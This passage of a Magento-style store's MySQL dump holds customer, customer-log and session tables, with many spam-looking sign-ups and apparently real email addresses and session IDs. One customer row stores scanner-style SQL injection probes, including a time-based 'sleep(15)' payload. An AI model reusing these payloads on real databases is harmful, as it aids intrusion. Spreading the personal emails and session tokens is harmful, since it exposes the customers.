(103, 'jXdIqrET vxfukYXpWuwPSbf', 'cofcgirl101@yahoo.com', 1, '2024-10-01 09:48:05', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(104, 'mHqRgkkGdDMAPks xPCYMANwT', 'steelesimfoniyax8834@gmail.com', 1, '2024-10-18 10:25:02', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(105, 'TFPhpytCELaaz MrwASwPD', 'kassiaanu31@gmail.com', 1, '2024-10-21 19:10:23', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(106, 'nAjZmuYYlv ZweLkcDnpu', 'sanngravesz7143@gmail.com', 1, '2024-10-26 02:34:14', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(107, 'HOSsIHHNLFtXUa GxqRtAjmmUUtGE', 'wvvvferijxmff@yahoo.com', 1, '2024-11-04 11:58:32', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(108, 'asd ads', 'wores42102@gianes.com', 1, '2024-11-17 09:57:17', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(109, 'MS Aprin Bacames D', 'kssspatel@outlook.com', 1, '2024-12-10 10:26:57', 1, NULL, 'Default Store View', '1980-01-01', 2, '2', NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(110, 'jig jdf', 'hotoxo5768@numerobo.com', 1, '2025-02-05 11:09:12', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(111, 'John John', 'lnjybaho@do-not-respond.me', 1, '2025-02-28 19:58:23', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(112, 'Hello TestUser', 'bjzqwamq@formtest.guru', 1, '2025-05-23 12:20:06', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(113, 'Hannah Shannon', 'mikesdrums@aol.com', 1, '2025-07-02 22:24:26', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(114, 'Claudia Semmens', 'arleendoug12@gmail.com', 1, '2025-07-04 22:00:59', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(115, 'Braian Ashley', 'carbonaracapibara87@outlook.com', 1, '2025-11-14 21:26:33', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(116, '317 CpjJwWHV CpjJwWHV CpjJwWHV (select 198766*667891)', 'testing@example.com', 1, '2026-01-02 07:01:15', 1, NULL, 'Default Store View', '1967-01-01', 1, '2023-03-22T15:34:00Z', NULL, '1 San Francisco NY 94102', '1 San Francisco NY 94102', 'CpjJwWHV', 'if(now()=sysdate(),sleep(15),0)', '555-666-0606', '94102', 'AF', 'NY', '1', 'San Francisco', '317-317-3137', '1', 'Testing'),
(117, '317 CpjJwWHV CpjJwWHV CpjJwWHV 1', 'testing@example.comAv3zbKMi', 1, '2026-01-02 07:14:57', 1, NULL, 'Default Store View', '1967-01-01', 1, '2023-03-22T15:34:00Z', NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(118, 'fKGRargthWozcAOjSeKfV UEJfcIwuKagcifpIVeeHmv', 'xadeyaja181@gmail.com', 1, '2026-01-03 11:04:14', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(119, 'olBslTmTvzLSBlriS YDEAhyKzJiDMuYpJlvC', 'ib.ih.as.eq.aj.e.0.6.7@gmail.com', 1, '2026-01-07 23:06:33', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(120, 'ldyvCRwlkiLHsmoBvmJiVad sawyRPVcvQnWkmaAHmIrq', 'fi.yi.v.e.cu.65@gmail.com', 1, '2026-01-08 10:42:35', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(121, 'JvWiOsMSgIoWVjPVWUT EKaNuPAyZMkYjVArrjouUytd', 'iqe.c.i.ya.li.k.o80.6@gmail.com', 1, '2026-01-11 16:07:07', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(122, 'wGfDUvkPqSfxRHrcSSDgeIM nsUudcodvszhlvjrmOIm', 'op.oy.im.o.baxe.h86@gmail.com', 1, '2026-01-13 15:18:22', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(123, 'QuMCXMJQFMzqcilHyJYyDbpl dDFzDoGqCdHqNQyGYPPjfl', 'ca.b.u.d.a.fa.d.u.m5.9.9@gmail.com', 1, '2026-02-02 11:23:23', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(124, 'RQttarDyZzENEgXt llWlXHKOkCXbpioQfPgitZX', 'i.dib.uq.uf.i.y.i.27.2@gmail.com', 1, '2026-02-05 11:11:10', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(125, 'flaawHfQACgaGlwsTPCCoNvd kwRVUMNQlgQosBSHQ', 'pum.eba.h.ezi.z.i0.8@gmail.com', 1, '2026-02-22 14:24:10', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(126, 'YAnAHhebXAmapUnTPy TRqjqKihxTbBfpcGSdOfQruC', 'j.id.a.xukas.as.1.15@gmail.com', 1, '2026-02-27 06:07:52', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(127, 'GnscdFEovnXxJZuBHniL HyOeUzubdoWwCwasfiG', 'se.y.oj.ere.6.87@gmail.com', 1, '2026-03-02 01:55:44', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(128, 'WzaNATCgQhnryDXwCtEFtV fheWCaoRHWemHBNWuqNDJr', 'em.u.vo.s.esexu.k58@gmail.com', 1, '2026-03-10 06:54:22', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(129, 'wcijRJrzklRWrrvsQtNr CNsZwbfPSviiqVlZ', 'h.o.fa.f.u.p.a.r.7.8@gmail.com', 1, '2026-03-12 21:19:18', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(130, 'aJpTXDrmzKqdbbIbfBdlvUao ZCjGpoNRyWdtFkwepg', 'o.seme.j.u.z.i.0.8@gmail.com', 1, '2026-03-27 17:53:04', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(131, 'AJmyOjofCXSEwapIB qkFThLFbkAojVvazISESvyp', 'i.g.ut.e.liva8.2@gmail.com', 1, '2026-03-28 09:04:04', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(132, 'vGwUoAeBSyetAkcCeNQol ZdXOyZUxywvBsPpqCpqmY', 'uq.o.h.ah.i.hejo45@gmail.com', 1, '2026-04-09 14:21:40', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(133, 'sDYWbzxJUrWKdIjl PIfdDCNqHBeRJeOPCwQSf', 'uloxu.h.esuj.i.b.45@gmail.com', 1, '2026-04-10 17:29:15', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(134, 'CaxjBqmIRIGhEiGuNbXOPUp xqZFrjHSRTBLNDBuxGjAVrL', 'r.o.c.u.ye.x.u.y559@gmail.com', 1, '2026-04-18 13:35:36', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(135, 'xmWoevRAgatyDfGZnxhYh pprBYaPwhTTzdJtyMxE', 'm.ohu.qu.b.4.1.1@gmail.com', 1, '2026-04-21 14:27:25', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(136, 'CNmvgaxbAQXuSDGMHXdKjfAZ gUskOIzxSXRbvQGSTcCXvtY', 'c.ahu.wu.zog.a.w0.4@gmail.com', 1, '2026-04-28 00:13:21', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(137, 'faEbkkJDrzlDlhkkkPSQc QNCxctlFQveQWTTZew', 'e.ko.y.ijavux.uk2.8@gmail.com', 1, '2026-04-30 04:11:24', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(138, 'SPGhxmNfkNuSymqAdjEtszNH ynShzhhrmODTJvjM', 'g.o.q.uqu.y.447@gmail.com', 1, '2026-04-30 22:07:25', 1, NULL, 'Default Store View', NULL, NULL, NULL, NULL, '', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `customer_group`
--

CREATE TABLE `customer_group` (
  `customer_group_id` int(10) UNSIGNED NOT NULL,
  `customer_group_code` varchar(32) NOT NULL COMMENT 'Customer Group Code',
  `tax_class_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Tax Class ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Group';

--
-- Dumping data for table `customer_group`
--

INSERT INTO `customer_group` (`customer_group_id`, `customer_group_code`, `tax_class_id`) VALUES
(0, 'NOT LOGGED IN', 3),
(1, 'General', 3),
(2, 'Wholesale', 3),
(3, 'Retailer', 3);

-- --------------------------------------------------------

--
-- Table structure for table `customer_log`
--

CREATE TABLE `customer_log` (
  `log_id` int(11) NOT NULL COMMENT 'Log ID',
  `customer_id` int(11) NOT NULL COMMENT 'Customer ID',
  `last_login_at` timestamp NULL DEFAULT NULL COMMENT 'Last Login Time',
  `last_logout_at` timestamp NULL DEFAULT NULL COMMENT 'Last Logout Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Log Table';

--
-- Dumping data for table `customer_log`
--

INSERT INTO `customer_log` (`log_id`, `customer_id`, `last_login_at`, `last_logout_at`) VALUES
(1, 2, '2020-08-22 08:24:12', NULL),
(2, 3, '2020-08-24 01:49:35', '2020-08-24 01:52:04'),
(4, 4, '2021-05-07 10:33:32', '2021-05-07 10:46:45'),
(5, 5, '2020-09-14 05:43:03', '2020-09-14 05:42:34'),
(8, 6, '2021-06-16 12:07:03', NULL),
(9, 7, '2021-04-26 09:11:35', NULL),
(10, 8, '2021-04-26 22:18:01', '2021-04-26 22:18:11'),
(12, 9, '2021-04-29 01:27:49', '2021-04-29 01:28:03'),
(14, 10, '2021-05-02 11:10:04', '2021-05-02 11:08:59'),
(21, 11, '2021-05-12 07:43:47', '2021-05-12 07:45:01'),
(23, 12, '2021-05-27 14:47:14', '2021-05-27 14:48:08'),
(25, 13, '2021-06-05 17:43:16', '2021-06-05 17:44:35'),
(27, 14, '2021-06-15 11:52:42', '2021-06-09 03:58:59'),
(32, 15, '2021-06-12 02:59:35', '2021-06-12 03:00:31'),
(36, 16, '2021-06-27 11:43:00', '2021-06-27 11:43:29'),
(38, 17, '2021-10-18 05:27:58', '2021-10-18 05:28:45'),
(40, 18, '2021-10-27 14:02:06', '2021-10-27 14:02:55'),
(42, 19, '2021-11-06 09:04:49', '2021-11-06 09:06:51'),
(44, 20, '2021-11-20 19:00:25', '2021-11-20 19:00:45'),
(46, 21, '2021-11-22 09:55:17', NULL),
(47, 22, '2021-12-03 09:49:20', '2021-12-03 09:51:44'),
(49, 23, '2021-12-21 02:49:21', NULL),
(50, 24, '2021-12-22 07:28:06', '2021-12-22 07:30:03'),
(52, 25, '2021-12-31 16:38:37', '2021-12-31 16:39:08'),
(54, 26, '2022-01-06 21:12:40', NULL),
(55, 27, '2022-01-12 14:38:27', '2022-01-12 14:39:50'),
(57, 28, '2022-01-14 01:49:27', '2022-01-14 01:49:55'),
(59, 29, '2022-01-22 07:27:25', '2022-01-22 07:28:04'),
(61, 30, '2022-01-23 09:16:37', '2022-01-23 09:17:25'),
(63, 31, '2022-02-07 18:51:30', '2022-02-07 18:54:17'),
(65, 32, '2022-02-23 21:09:11', '2022-02-23 21:09:25'),
(67, 33, '2022-02-24 23:12:59', '2022-02-24 23:16:21'),
(69, 34, '2022-03-06 21:48:05', '2022-03-06 21:49:12'),
(71, 35, '2022-03-21 09:39:04', '2022-03-21 09:39:44'),
(73, 36, '2022-03-27 13:21:47', '2022-03-27 13:22:27'),
(75, 37, '2022-03-28 13:01:36', '2022-03-28 13:02:37'),
(77, 38, '2022-04-02 08:01:06', '2022-04-02 08:02:18'),
(79, 39, '2022-04-03 02:35:48', '2022-04-03 02:36:25'),
(81, 40, '2022-04-10 13:11:05', NULL),
(82, 41, '2022-04-16 06:33:29', '2022-04-16 06:34:10'),
(84, 42, '2022-04-18 15:17:40', NULL),
(85, 43, '2022-04-23 00:03:56', '2022-04-23 00:04:23'),
(87, 44, '2022-05-05 22:22:57', '2022-05-05 22:23:30'),
(89, 45, '2022-05-06 18:26:18', '2022-05-06 18:26:37'),
(91, 46, '2022-05-13 10:04:04', NULL),
(92, 47, '2022-05-14 01:52:47', '2022-05-14 01:53:49'),
(94, 48, '2022-06-04 23:05:44', '2022-06-04 23:06:44'),
(96, 49, '2022-06-22 14:50:38', '2022-06-22 14:51:18'),
(98, 50, '2022-06-28 00:43:00', '2022-06-28 00:43:16'),
(100, 51, '2022-07-20 04:55:13', NULL),
(101, 52, '2022-07-20 17:27:08', NULL),
(102, 53, '2022-07-29 22:54:20', NULL),
(103, 54, '2022-07-30 13:14:46', NULL),
(104, 55, '2022-08-14 02:33:03', NULL),
(105, 56, '2022-08-28 04:30:37', NULL),
(106, 57, '2022-10-24 18:48:14', NULL),
(107, 58, '2024-09-28 06:34:41', NULL),
(108, 61, '2022-12-15 01:36:58', NULL),
(109, 67, '2023-05-31 16:43:18', NULL),
(110, 68, '2024-11-03 18:25:23', NULL),
(111, 69, '2023-08-02 01:16:26', NULL),
(112, 70, '2023-08-02 19:40:35', NULL),
(113, 71, '2023-08-03 17:48:36', NULL),
(114, 72, '2023-08-04 18:33:12', NULL),
(115, 73, '2023-08-05 11:37:13', NULL),
(116, 74, '2023-08-12 01:27:45', NULL),
(117, 75, '2023-08-12 11:08:00', '2023-08-12 10:32:34'),
(127, 76, '2023-09-02 04:00:17', NULL),
(128, 77, '2023-09-05 13:01:47', NULL),
(129, 78, '2023-09-11 00:20:19', NULL),
(130, 79, '2023-11-10 10:35:22', NULL),
(131, 80, '2023-11-24 01:23:51', NULL),
(132, 81, '2023-11-26 22:37:26', NULL),
(133, 82, '2023-12-01 00:22:47', NULL),
(134, 83, '2023-12-02 06:52:19', NULL),
(135, 84, '2023-12-07 10:59:16', NULL),
(136, 85, '2023-12-08 12:58:09', NULL),
(137, 86, '2023-12-10 12:24:35', NULL),
(138, 87, '2023-12-12 04:13:57', NULL),
(139, 88, '2023-12-13 18:55:51', NULL),
(140, 89, '2023-12-31 13:54:46', NULL),
(141, 90, '2024-01-01 21:04:17', NULL),
(142, 91, '2024-01-27 10:55:01', NULL),
(143, 92, '2024-02-02 05:46:56', NULL),
(144, 93, '2024-02-05 02:48:03', NULL),
(145, 94, '2024-02-16 23:27:57', NULL),
(146, 95, '2024-02-24 22:49:50', NULL),
(147, 96, '2024-03-06 08:37:29', NULL),
(148, 97, '2024-03-12 15:33:49', NULL),
(149, 98, '2024-03-28 08:27:19', NULL),
(150, 99, '2024-06-17 01:57:50', NULL),
(151, 100, '2024-09-17 12:18:08', '2024-09-17 12:18:30'),
(153, 101, '2024-09-22 17:27:38', '2024-09-22 17:28:00'),
(156, 102, '2024-09-28 19:21:18', '2024-09-28 19:21:33'),
(158, 103, '2024-10-01 09:48:07', '2024-10-01 09:48:29'),
(160, 104, '2024-10-18 10:25:05', NULL),
(161, 105, '2024-10-21 19:10:25', NULL),
(162, 106, '2024-10-26 02:34:17', NULL),
(164, 107, '2024-11-04 11:58:34', '2024-11-04 11:58:53'),
(166, 108, '2024-11-17 09:57:19', NULL),
(167, 110, '2025-02-05 11:09:14', NULL),
(168, 111, '2025-02-28 19:58:26', NULL),
(169, 112, '2025-05-23 12:20:10', NULL),
(170, 113, '2025-07-02 22:24:29', NULL),
(171, 114, '2025-07-04 22:01:02', NULL),
(172, 116, '2026-01-02 07:02:26', NULL),
(173, 118, '2026-01-03 11:04:16', NULL),
(174, 119, '2026-01-07 23:06:35', NULL),
(175, 120, '2026-01-08 10:42:37', NULL),
(176, 121, '2026-01-11 16:07:09', NULL),
(177, 122, '2026-01-13 15:18:24', NULL),
(178, 123, '2026-02-02 11:23:25', NULL),
(179, 124, '2026-02-05 11:11:12', NULL),
(180, 125, '2026-02-22 14:24:11', NULL),
(181, 126, '2026-02-27 06:07:54', NULL),
(182, 127, '2026-03-02 01:55:46', NULL),
(183, 128, '2026-03-10 06:54:24', NULL),
(184, 129, '2026-03-12 21:19:20', NULL),
(185, 130, '2026-03-27 17:53:06', NULL),
(186, 131, '2026-03-28 09:04:05', NULL),
(187, 132, '2026-04-09 14:21:42', NULL),
(188, 133, '2026-04-10 17:29:17', NULL),
(189, 134, '2026-04-18 13:35:38', NULL),
(190, 135, '2026-04-21 14:27:27', NULL),
(191, 136, '2026-04-28 00:13:24', NULL),
(192, 137, '2026-04-30 04:11:26', NULL),
(193, 138, '2026-04-30 22:07:42', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `customer_visitor`
--

CREATE TABLE `customer_visitor` (
  `visitor_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Visitor ID',
  `customer_id` int(11) DEFAULT NULL COMMENT 'Customer ID',
  `session_id` varchar(64) DEFAULT NULL COMMENT 'Session ID',
  `last_visit_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Last Visit Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Visitor Table';

--
-- Dumping data for table `customer_visitor`
--

INSERT INTO `customer_visitor` (`visitor_id`, `customer_id`, `session_id`, `last_visit_at`) VALUES
(1, NULL, 'sbfjvea1e7et71nevm9avr5iou', '2020-08-03 15:00:41'),
(2, NULL, 'dgirjee0bv1tp87n43acqs0f5c', '2020-08-17 11:08:09'),
(3, NULL, 'ugs2uauq2ljlvmue9hqpevhp58', '2020-08-22 05:12:07'),
(4, NULL, '2keisrv3nph90aolkpr0f4bdua', '2020-08-22 07:12:49'),
(5, 2, 'endob22s2qsb3t2s8o9jnsk121', '2020-08-22 08:24:13'),
(6, NULL, 'ktdq0brg07erfdg2p8b56q32up', '2020-08-23 04:28:52'),
(7, NULL, '13gu6uonbv4pam3hgsmq1hod7p', '2020-08-23 04:30:10'),
(8, NULL, '4rmej7h3upbckuevrbaoenbik1', '2020-08-23 10:04:20'),
(9, 3, 'c7ver824afvtrb139h02op1foj', '2020-08-24 01:52:04'),
(10, NULL, '5en05h4rntl3n0jqgu97ha9437', '2020-08-26 03:12:57'),
(11, 4, 'bnl7uj348qr3g72gkrbpg276cv', '2020-08-26 06:11:01'),
(12, 5, 'cdfu59obme63g0r2pn6pdf72pj', '2020-09-14 05:42:34'),
(13, 5, '55e2gbfq2h622ct4a52vteevai', '2020-09-14 05:43:03'),
(14, NULL, 'v8et7kcdutjgg8hnv1dm3q3oq8', '2021-04-13 04:19:41'),
(15, NULL, '98i08fn8vl0n9un81jnjljrf0i', '2021-04-13 05:45:54'),
(16, NULL, 'bb82n5s27ig4h350tdm8tvpfbo', '2021-04-13 05:52:19'),
(17, NULL, 'r8mr7tlgvfqfhl8qn00jr70g9t', '2021-04-13 12:12:36'),
(18, NULL, 'e0dgath5rk48c5lama8q214lo8', '2021-04-14 04:55:30'),
(19, 6, 'i5h50qt7nureambg3l1cg7p8dc', '2021-04-21 10:08:30'),
(20, 7, 'vn4pq1voicufmj0fvpi5dq3ih7', '2021-04-26 09:11:36'),
(21, 8, 'pcqe8chphrf0rv4f2h2rr97uj6', '2021-04-26 22:18:11'),
(22, NULL, 'o8bh7f121igqfnbe4ed4bm1dd1', '2021-04-26 22:18:59'),
(23, 9, 'pn8k7icut1j5c90d9trh07ljhq', '2021-04-29 01:28:03'),
(24, NULL, 'vj59ai6dv3j3cmnf3jkpllja8i', '2021-04-29 01:28:33'),
(25, 10, 'sb8ftb4qqrlj7hk23uvhi9hifm', '2021-05-02 11:08:59'),
(26, 10, '02upm1bmkpp3arota4tnvfj6e9', '2021-05-02 12:03:40'),
(27, 6, 'q3n1uvp9dki6a76s130k43esgm', '2021-05-03 09:17:48'),
(28, 6, 'b0e67eanfj1s6f1um475oforl8', '2021-05-05 11:08:30'),
(29, 4, '5s73fac1sgghti3qq7pt0vdg92', '2021-05-07 10:46:45'),
(30, NULL, 'ndqg382kj9s9etdsvm8vegj8cf', '2021-05-11 05:11:37'),
(31, 11, 'vsukbaotfoqopd3sf47smdb9fd', '2021-05-12 07:45:01'),
(32, NULL, 'nhssur8hglv6410gp2fovlgklo', '2021-05-12 07:46:36'),
(33, NULL, 'c3d7lobvc409o23p4nmq2olna7', '2021-05-12 08:01:14'),
(34, NULL, '5m5k3i1vg42us5n6j5i3qinupa', '2021-05-18 03:30:46'),
(35, NULL, 'qekik09r3pjcanab45ulil82d1', '2021-05-22 07:32:15'),
(36, NULL, '8schljb0p1f8ubi18kif70dlkf', '2021-05-27 05:55:44'),
(37, 12, 'd90q44bicqrdo82ls5gthgg42r', '2021-05-27 14:48:08'),
(38, NULL, 'k6m2jmmqg9nsvg7ost3iq59b3g', '2021-05-27 14:50:13'),
(39, NULL, '252oii12eers3hv5q3e66sqp1q', '2021-06-01 14:18:28'),
(40, 13, 'gp3gs0cf5t11l3me3v7p5ko5lf', '2021-06-05 17:44:34'),
(41, NULL, 'snrs9dnadl65b1ac9kl42hq6rr', '2021-06-05 17:45:35'),
(42, NULL, 'qgbmlif948frp3fqvbnof2adgo', '2021-06-07 04:16:19'),
(43, 14, 'feqt4s47i3i05talpss29lpecn', '2021-06-08 12:09:09'),
(44, 14, 'jhrt8uvepartlorkhffgmjqjeb', '2021-06-09 03:58:59'),
(45, NULL, '6546plppfbqbc6i9a6je1a8pu5', '2021-06-09 04:26:49'),
(46, 14, 'f5m3vv4lq6505b3oivr1nip1e9', '2021-06-09 09:47:44'),
(47, NULL, '5su8bko0ebcn8av3r5lcvivdkn', '2021-06-09 06:42:59'),
(48, NULL, 'rp58nsv5v4dbckbuqe9f3a9v37', '2021-06-09 06:43:24'),
(49, NULL, 'eb34803b8ivdu9sgjl8t18tanu', '2021-06-09 07:38:33'),
(50, NULL, 'dhbt5icdjkd3khpqq5cu4rresn', '2021-06-09 08:58:13'),
(51, NULL, 's67unnsl8t1rdoof381phcthjq', '2021-06-09 09:55:40'),
(52, 14, '23ki7is37p9osdp11j04229o7o', '2021-06-09 12:00:29'),
(53, 15, '8q1d5shkj7ttd0bco2eiunlhb9', '2021-06-12 03:00:31'),
(54, NULL, '2l28sslegtusd0ou3oit0lo5j1', '2021-06-12 03:02:53'),
(55, 14, '9qovoncplrptppbrrjf04pmaij', '2021-06-15 12:15:09'),
(56, NULL, '3o83fd047h17jd31ejkvkkua83', '2021-06-15 12:31:48'),
(57, NULL, 'r0t2jn6daeo539rmr3hdnnr7eg', '2021-06-15 15:49:48'),
(58, NULL, 'gc59fds5pv5evphf3tp2ohsloo', '2021-06-16 05:33:30'),
(59, NULL, '2m1vd65g9j9ho2vnhh9kp33h3i', '2021-06-16 06:47:03'),
(60, NULL, '2987k2fmta30de98535iao00ba', '2021-06-16 06:54:07'),
(61, 6, '0d9v9dte6d1h7o9tnltf8qqtt4', '2021-06-16 12:09:15'),
(62, NULL, 'pstiga7u69mf92382rtap247ud', '2021-06-26 05:20:26'),
(63, 16, 'kv7p15f3egfc8r990tmngjmvlr', '2021-06-27 11:43:29'),
(64, NULL, 'ppu8m50uh46jccmgolb29q16ug', '2021-06-27 11:44:29'),
(65, NULL, 'o1oedfstb4ogs2d088hgvtkhu4', '2021-06-29 05:00:38'),
(66, 17, 'htgnslbe2b2m3qtu7q0t1dgmdr', '2021-10-18 05:28:45'),
(67, NULL, 'j97j0foa1tdknhngrf2cp70lm8', '2021-10-18 05:30:52'),
(68, NULL, 'ue5b9hkp16cq1tqe589esbgb6l', '2021-10-20 17:28:31'),
(69, NULL, '9op2vidqkb7k66vnrjfri7e3ej', '2021-10-20 17:34:13'),
(70, NULL, 'v4b940d3eru821ktr4m8jau2fv', '2021-10-21 02:02:02'),
(71, NULL, '5mvjk46k7dmsr4fmn6nlugp7au', '2021-10-24 01:42:07'),
(72, 18, 'plr6msh55hdt646r5i44um6h49', '2021-10-27 14:02:55'),
(73, NULL, 'kig8ctqa3m2p461j85hoas15mg', '2021-10-28 04:56:55'),
(74, NULL, '7goat604vmqllkfforl03chi1r', '2021-10-29 01:27:53'),
(75, NULL, '0too941jo9r3668h654rlrdhbc', '2021-10-30 04:34:13'),
(76, NULL, '5mii6rv880hd391oab1ucq5pbb', '2021-10-30 13:43:17'),
(77, NULL, 'stm7verhmgnjkg1j6vsr2n3qiv', '2021-10-30 23:45:37'),
(78, NULL, 'qkfsr69kesikitv531prtqk3uc', '2021-10-31 00:28:28'),
(79, NULL, 'lu4hqu21eurenhk7ob50uc2bea', '2021-11-02 19:07:30'),
(80, 19, 'nfmb01pd228k5efb4srn29d508', '2021-11-06 09:06:50'),
(81, NULL, '1ig8e1bbln3lqo0fijjp8sjfh9', '2021-11-06 09:08:18'),
(82, NULL, 'k6d6pr8gstlf5i3bfouca40fot', '2021-11-07 09:17:35'),
(83, NULL, '5g72ghls63sghga2426htjna4t', '2021-11-09 20:15:18'),
(84, NULL, 'gdvdmqv6ksv9agr7af2f16je6u', '2021-11-10 06:00:23'),
(85, NULL, 'jrrab8eaa33kkn537oujeb07jn', '2021-11-10 15:14:37'),
(86, NULL, 'bbabmq5kip3hh9qrsn8jl78ni9', '2021-11-10 15:32:28'),
(87, NULL, 'hho791u2g0h45024sc0f1es75k', '2021-11-11 00:15:50'),
(88, NULL, 'oidrch8qb7a1g7445224a96aen', '2021-11-13 08:25:13'),
(89, NULL, 'avlhaqk8erkcructcfbpijft9t', '2021-11-14 01:46:05'),
(90, NULL, 'sjrtt9lu3hm4e6l1r0c72hqnv3', '2021-11-14 18:08:26'),
(91, NULL, 'h92qin629s6i38li58fshuha8s', '2021-11-15 04:04:38'),
(92, NULL, 'h9cq1mn8icb19bdf1hldid0f59', '2021-11-15 08:16:48'),
(93, NULL, '278e3gh6lg8bjkm14nr3s0s73h', '2021-11-18 02:13:42'),
(94, NULL, 'a0knra4umepmfna1fl1gjnknm9', '2021-11-19 09:44:05'),
(95, NULL, 'ab7nuehjkm056mk69vteesvi3a', '2021-11-20 12:22:35'),
(96, NULL, 'lpeodjh6pmkf9lkpljfmmrqv2r', '2021-11-20 12:48:22'),
(97, 20, 'icavlmdkc6dp98jkgjo8dvgc23', '2021-11-20 19:00:45'),
(98, NULL, 'ssutk55u63rvoefcqqje7d8anp', '2021-11-20 19:01:17'),
(99, NULL, '6r1bn8goidlu6m4h3pdgc6cloe', '2021-11-21 12:26:30'),
(100, NULL, '5mdeqaf05qn4l21sjo0ojqil2q', '2021-11-21 16:49:14'),
(101, NULL, 'f05bca3204l7cal3iq4dua3gve', '2021-11-21 20:35:17'),
(102, NULL, 'ck6mg4p75at29qasb1pqoqtksj', '2021-11-22 00:29:56'),
